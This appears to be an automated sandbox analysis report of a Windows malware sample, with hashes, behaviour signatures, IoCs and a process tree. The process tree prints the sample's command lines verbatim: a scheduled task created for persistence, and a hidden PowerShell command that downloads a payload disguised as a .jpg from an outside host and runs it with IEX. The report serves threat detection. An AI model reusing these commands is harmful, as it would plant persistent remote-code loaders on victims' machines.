Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    48s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/08/2023, 12:23

General

  • Target

    feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe

  • Size

    6KB

  • MD5

    77421b1f90fc1e9247f693e857e8c429

  • SHA1

    63c26635980d5a185a24d1be79c877a1e8507133

  • SHA256

    feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc

  • SHA512

    0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095

  • SSDEEP

    96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://a.top4top.net/p_814sg63b2.jpg

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
    "C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
      2⤵
      • Creates scheduled task(s)
      PID:4836
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
    1⤵
      PID:2136
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
        2⤵
          PID:4296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
            3⤵
              PID:4572

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs

          Filesize

          537B

          MD5

          44476af998bf0a5714e3ab100f022a1e

          SHA1

          bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e

          SHA256

          ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2

          SHA512

          e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99

        • memory/2968-133-0x000001D5F6410000-0x000001D5F6418000-memory.dmp

          Filesize

          32KB

        • memory/2968-135-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

          Filesize

          10.8MB

        • memory/2968-137-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

          Filesize

          10.8MB

        • memory/4572-139-0x00007FFD1F950000-0x00007FFD20411000-memory.dmp

          Filesize

          10.8MB